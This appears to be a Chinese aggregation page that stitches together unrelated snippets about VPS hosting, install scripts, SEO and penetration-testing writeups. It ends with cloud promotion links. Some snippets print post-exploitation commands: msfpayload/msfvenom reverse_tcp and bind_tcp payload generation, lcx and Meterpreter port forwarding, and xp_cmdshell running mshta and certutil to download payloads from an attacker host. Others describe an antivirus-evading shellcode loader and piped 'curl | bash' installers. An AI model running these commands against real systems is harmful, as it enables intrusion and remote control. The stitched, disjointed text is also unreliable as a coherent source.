网站空间就是指用来存储网站的文字、文档、数据库、图片等的空间。在大连网站建设完成后,网站的持有者需要购买空间才能发布内容。网站是否能够让用户拥有良好的体验以及是否有利于搜索引擎的抓取,选择合适的网站空间是非常重要的。
我的Hexo并没有直接部署在本地机器或者VPS上,而是通过Cloud Studio => 腾讯开发者平台(原coding) => VPS这样的流程来更新博客,这就导致每次改动博客或更新博文变得很繁琐,所以我决定用WebHook来精简流程,即Cloud Studio => VPS,本文为过程记录。
随着全球化的发展和互联网的普及,越来越多的企业和个人需要处理跨国网络通信的问题。其中,一个常见的需求就是将海外流量转发到国内服务器,以满足业务需求或提高访问速度。本文将深入探讨这一过程,包括其背后的原理、技术实现以及如何编写代码来实现这一功能。
Tor 隐藏服务使用 .onion 域名。这里将向你演示如何创建一个安全配置以阻止信息泄露、隐藏服务的 .onion 网站。
彩虹域名转发程序V2.0源码分享 程序安装说明: 1、把压缩包内的文件上传至空间 2、访问/install安装 安装注意事项: 需要空间支持域名泛绑定或者为拥有独立IP的VPS(如
自己搭建的博客,代码托管到github,心想博客更新那么频繁,每次push代码后都到服务器上手动部署,实在是太麻烦, 于是想到自动化部署,开始的时候只是想通过一个简单的 shell +cron的方法来解决,但是这方法真的太笨了,一点都不 智能 。想到github的webhook,之前只是听说,明白其原理,并没有实操,这次刚好可以亲自体验一把了。具体如下:
系统:推荐CentOS 7.1+ ,确保是干净的操作系统,没有安装过其它环境带的Apache/Nginx/php/MySQL/pgsql/gitlab/java(已有环境不可安装!请注意宝塔面板也无法与kangle共存!)
注意事项 收集一些自用的shell脚本,可以放心使用。 服务器TCP回程路由测试 curl https://www.coorw.com/speedtest/test.sh|bash #来自李子博客,适用于centos6/7,测试服务器TCP回程是否为CN2或联通移动直连线路。 VPS一键测速脚本整合版。 使用方法: wget vpstest.cn/it && bash it 或 wget git.io/vpstest && bash vpstest 或 wget -O it vpstest.cn &&
默认情况下你的服务器有多少网络带宽(上行),Nginx就能消耗掉多少,来者不拒。
说明:我们手上经常有很多廉价的VPS,有时候使用某些软件应用的时候,会出现CPU跑满的情况,而长时间跑满会被VPS商家停掉,所以这里我们需要想办法来限制进程CPU使用率,这里就说个教程。
说明 :我们手上经常有很多廉价的 VPS,有时候使用某些软件应用的时候,会出现 CPU 跑满的情况,而长时间跑满会被 VPS 商家停掉,所以这里我们需要想办法来限制进程 CPU 使用率,这里就说个教程。
linux一键dd脚本支持Debian 9/10/11、Ubuntu 16.04/18.04/20.04、CentOS 7/8、RockyLinux 8和AlmaLinux 8系统的网络重装,自动适配境内境外系统源,适用于 GigsGigsCloud、AkkoCloud、GreenCloud、Virmach和腾讯云等vps和云服务器。
目录[-] SSDB的性能很突出,与Redis基本相当了,Redis是内存型,容量问题是弱项,并且内存成本太高,SSDB针对这个弱点,使用硬盘存储,使用Google高性能的存储引擎LevelDB,适合大数据量处理并把性能优化到Redis级别,具有Redis的数据结构、兼容Redis客户端,还给出了从Redis迁移到SSDB的方案。 本文是将我安装和测试的步骤记录下来,总结成文档,便于日后使用。 1、编译安装 照着官方的教程下载安装: 下载: wget --no-check-certificate
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
今天给大家介绍的是一款能够帮助渗透测试人员实时执行DNS重绑定(Rebinding)测试的DNS服务器。
演示:ShopXO源码程序(WEB+小程序)+一门APP打包(输入手机站网址或上传Html文件,三分钟在线生成APP)
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
在当今互联网环境中,保护数据传输安全至关重要。本文将分享一个简单而强大的方法,通过一键搭建HTTPS代理服务器来加密和保护您的网络通信。无论是个人使用还是企业部署,这篇文章都会为您提供详细且易于操作的指南。
前记 Xdebug 前记 定义 开启Xdebug 适用目标 实验效果 注意事项 session.upload_progress 定义 开启session.upload_progress. 适用目标 实
0x02 reverse_tcp实战应用过程 (1) 前期测试 试了些已公布的2008提权EXP,不过都失败了,第三方软件也只找到一个Filezilla Server。先把C:\Program Files (x86)\FileZilla Server文件夹打包到我们本地,然后再用lcx把Filezilla Server的14147端口转发出来,lcx执行命令如下。 首先VPS机器监听51端口,连接用14147端口: VPS机器执行: C:\>lcx.exe -listen 51 14147 目标机器执行: /c C:\aspSmartUpload\lcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx转发了FileZilla Server的14147端口后还是连接不上,返回右上图这样的报错,Google翻译报错信息得知:协议错误:未通过身份验证,关闭连接,连接到服务器关闭。使用netstat -ano命令查看当前网络连接状态如下。 TCP 9*.1*9.4.1*3:139 0.0.0.0:0 LISTENING 4 TCP 9*.1*9.4.1*3:54133 1*3.2*1.*7.1*8:51 ESTABLISHED 2028 TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 1040 TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING 1088 TCP 127.0.0.1:14147 127.0.0.1:49160 ESTABLISHED 1088 TCP 127.0.0.1:49160 127.0.0.1:14147 ESTABLISHED 5736 可以看到我们已经与目标机器建立了一个完整TCP连接,而且我们本地机器也成功的返回了数据,但是好像返回的数据信息中有错误,如下图。 当前问题: 不能正常把目标服务器的FileZilla Server 14147端口给转发出来,返回数据中出错了,所以无法在本地连接上FileZilla Server服务端。 解决办法: 利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件,然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用 如果我们自己也处于内网环境的情况下,那么就需要先在路由器里进行端口映射配置,然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件,命令如下。 root@devil:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=1*3.2*1.*7.1*8 LPORT=12345 X > /media/sf_系统学习/test.exe 先把我们生成好的test.exe载荷文件上传至目标机器的可读/写目录下,然后进入到MSF完成所有必填的配置选项,执行命令如下。 use exploit/mutil/handler //加载监听模块 set PAYLOADY windows/x64/meterpreter/reverse_tcp //设置攻击载荷 set LHOST 192.168.1.4 //设置攻击者内网IP set LPORT 12345 //设置本地监听端口 exploit //exploit执行监听 将必填配置选项完成后执行exploit命令进行监听,然后在WebShell执行C:\aspSmartUpload\test.exe载荷文件,如果成功的话就会返回一个reverse_tcp反向连接的会话。 成功得到目标机器Meterpreter会话,然后直接使用portfwd命令进行端口转发即可,执行命令如下。 meterpreter > portfwd add -l 14147 -p 14147 -r 127.0.0.1 使用portfwd命令成功执行端口转发操作后,我们再来连接目标机器的FileZilla Server服务端看下是否能正常连接
小编发现很多同学在使用阿里云服务器搭建PHP网站的时候会用到WDCP面板,用WDCP面板大家最为关注的就是WDCP所占用的内存,很多童鞋说目前最新版本的WDCP面板比较占用系统资源,尤其是占用内存较大。那么对于小内存的服务器和VPS我们该如何来优化WDCP所占用的系统资源呢?
新站上线初期,很少会考虑到seo的问题,运营一段时间后才会发现许多问题,如果能够在网站建设之前,设计好seo基础流程,当然是最好不过了。下面通过以下几点,简单的讲诉下网站seo设计的流程。
渗透测试有时其实并不是那么难,现在有很多工具被设计用来简化过程,让渗透测试者们更方便,更省时地达到预期目标。今天要介绍的工具是AutoSploit,顾名思义,这个工具的灵感就来源于“高效渗透”,由于该
最近在学习免杀,学了如何使用go来实现shellcode加载器,于是打算写一款gui版本的shellcode加载器。实测过 bypass火绒、金山毒霸、360全家桶、360核晶、wdf、迈克菲等主流杀软
Date/time:2013年,早想写这篇文章了,由于最近一直很忙,拖了半个月才抽出时间来写,这篇文章主要记录的是我在一次提权过程中遇到的问题和解决办法,在这里特别感谢@烟神、@落寞两位大哥的耐心指导与讲解。这个站点使用Asp + Access,一个很普通的SQL注入漏洞,这里就不详细写了。
魏艾斯博客的 wordpress 更新比较慢,在 3.7 版本停留了很久,后来手动升级到 4.73 版本和 4.86 版本,这又过去了半年时间,wordpress 官方版本已经更新到 4.95en 了,于是就更新到了 4.94cn 版本,记录一下手动更新过程和注意事项。 之前写过一个WordPress 手动升级更新方法,里面有一些遗漏的地方,就在本文补充完善一下。更新 wodrepss 到最新版本可以及时跟上官方程序优化和补丁,好处多多。 更新 wordpress 之前切记备份网站文件和数据库,这是老魏敢折
目前支持的操作系统为:CentOS 7-8、Debian 8-10、Ubuntu 16-18,操作系统要求64位。请根据自己的VPS位置复制下面的命令:
说起服务器运维来,明月也谈不上是老手,因为明月使用 VPS 的时间也就这一两年的事儿,以前都是虚拟共享主机也就无从谈起“运维”了(当然,以前 VPS 价格偏贵也是不争的事实),自从决定购买自己的 VPS 开始,明月才算是开始学习自己运维服务器,跟很多站长不同的是明月的运维是从控制台终端开始的,各种服务器面板我试用过几个主流的,但我都没有在自己的 VPS 上使用过,自己的服务器我还是偏向于控制台终端的形式来管理。
2、安装完成后使用finalshell做本地端口转发登录网页端plex继续安装,参考下图。注意!必须先本地转发登录才能完成安装,否则是无法发现plex服务器的!
Bheem项目是一套小型Bash脚本的合集,它能够以迭代方式运行并执行各种工具,然后以有组织的方式重新处理和存储网络侦察过程中的数据输出。这个项目最早是为个人使用的侦察自动化任务而创建的,并且从未打算开源。但考虑到社区的需求,Bheem项目现在正式公开给大家。
这篇文章来自@Sin好友投稿,和我之前写的"记一次从Jboss到3389远程桌面案例"是一个目标,但我只是记录了遇到的问题,他写的更全一些,不过也不完整。
由于刚毕业腾讯云校园优惠套餐结束,无法进行套餐续期。目前将博客数据迁移到阿里云轻量云服务器,带宽5M是腾讯云带宽的5倍。以前也开过CDN但由于各种原因关闭了。近期迁移数据时考虑到腾讯云给的是1M带宽,访问量多时比较慢,而目前使用的阿里云也仅仅只有5M带宽。
近年来,有关云计算的信息、产品和概念,正充斥着互联网的每个角落,在互联网+的背景之下,云技术的出现更是让许多企业的业务数据向云计算靠拢。 1什么是云主机服务器? 云服务器是一种类似VPS服务器的虚拟化技术, VPS是采用虚拟软件,VZ或VM在一台服务器上虚拟出多个类似独立服务器的部分,每个部分都可以做单独的操作系统,管理方法同服务器一样。而云服务器是在一组集群服务器上虚拟出多个类似独立服务器的部分,集群中每个服务器上都有云服务器的一个镜像,从而大大提高了虚拟服务器的安全稳定性,除非所有的集群内服务器全部出现
EXEC master..xp_cmdshell 'mshta http://192.168.186.3:8080/yGwnzfy4cc.hta' 注意事项: 添加虚拟路由后配置hta_server模块选项时SRVHOST如果还用默认的0.0.0.0则生成URL的IP地址还是VPS的,所以在不出网主机上无法访问和执行,最终导致无法上线。 思路拓展: bind_tcp/reverse_tcp/reverse_tcp_rc4与hta_server的利用方式差不多,都要用到MSF虚拟路由,只是要重新生成/上传载荷文件。这种方式在某些不出网场景下“文件落地”可能是个麻烦事,不过在我们模拟的这个场景下可以利用这台可以出网的Web服务器来进行文件落地。 EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/msf.exe C:\ProgramData\msf.exe' 0x04 Socks代理 + Proxychains 我们先用autoroute模块自动添加虚拟路由,再用MSF中的Socks模块开一个Socks代理,设置选项可以不做修改,直接默认执行即可。MSF6已将socks4/5都集成到socks_proxy模块中了。 run post/multi/manage/autoroute bg use auxiliary/server/socks4a exploit Socks4代理开好后找到/etc/proxychains.conf配置文件,在底部填入127.0.0.1和1080端口,然后再用proxychains代理工具执行curl或nc验证下看是否已经代理成功? proxychains curl http://192.168.186.4 proxychains nc -zv 192.168.186.4 1433 确定Socks代理没问题后再使用msfvenom生成一个bind_tcp载荷文件,通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。 msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > /var/www/html/bind.exe 另起一个命令终端用proxychains代理工具来启动msfconsole,配置好handler监听模块bind_tcp相关选项执行监听,在中国菜刀中利用xp_cmdshell组件执行bind.exe文件后即可上线。 流量走向:
这篇文章我们主要介绍的是如何利用常用Webshell管理工具中的自定义代码执行功能来上线MSF,附带了中国蚁剑、冰蝎和哥斯拉的内存加载上线,实战渗透中如果遇到以下场景时可尝试文中方法绕过。
基本所有的VPS服务器商家,都会提供免费的Linux系统供安装,比如CentOS、Debian、Ubuntu等。那为什么还要使用一键DD脚本重装/更换系统呢?
收集一些自用的shell脚本,适用于懒人,关键词替换为 5hadows0cks 和 v7n 原因你懂的。
描述:在大多数应用场景下Ubuntu借助包管理器apt-get安装软件包很方便,前提是服务器要能够联网;但是如果在。政府或企业内网的服务器,通常是不与互联网连通的,这时候部署软件只能借助文件拷贝的方式,感觉回到了原始时代。而且更为严重的问题是软件包部署过程中的相互依赖的问题;
本脚本适用环境: 系统支持:CentOS6+,Debian7+,Ubuntu12+ 内存要求:≥128M 更新日期:2017 年 05 月 28 日
LNMP一键安装包是一个国人开发的非常优秀的免费的LNMP(Nginx/MySQL/PHP)、LNMPA(Nginx/MySQL/PHP/Apache)、LAMP(Apache/MySQL/PHP)生产环境的Shell程序。无需一个一个的输入命令,无需值守,编译安装优化编译参数,提高性能,解决不必要的软件间依赖,特别针对配置自动优化。
这篇文章记录的是朋友在某次项目测试中遇到的一个因存在WAF和多个防护软件而无法提权的问题,这次绕防护提权的过程中也是踩了不少的坑,记录分享下。
最近看到几篇有关WebRTC泄露源IP的文章,这个问题其实很多年前就有人提出来了,只是当时没咋引起重视;最近看又有师傅提起了,写篇文章简单记录分享下。
OJ输入输出练习 1. 练习1 1.1 题目【无输入组数,无退出要求】 1.2 代码C++ 1.3 注意事项 2. 练习2 2.1 题目【告知输入组数】 2.2 代码C++ 2.3 注意事项 3. 练习3 3.1 题目【0 0 退出】 3.2 代码C++ 3.3 注意事项 4. 练习4 4.1 题目【每组数据一行,每行的第一个整数为整数的个数n;0退出】 4.2 代码C++ 4.3注意事项 5. 练习5 5.1 题目【每组数据一行,每行的第一个整数为整数的个数n;告知组数】 5.2 代码C++ 5.3 注意
在互联网的环境没有比2016年好,可以说更为恶劣,特别是以国内新浪、知乎为代表的网站,手机访问时各种引诱下载APP,然后通过APP要求手机的各种权限,获取各种敏感信息:通讯录、归属地、行程轨迹、短信内容、输入法记录、扫描本地局域网设备等等…
这里很多开发者喜欢使用RGB或者十六进制的值进行表示颜色,别的属性可以,上面两个不行
在本篇博客中,我们将深入探讨各种开源协议,包括它们的优点、局限性,以及在使用这些协议时需要注意的事项。最后,我们会提供一个详细的开源协议对比表格。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
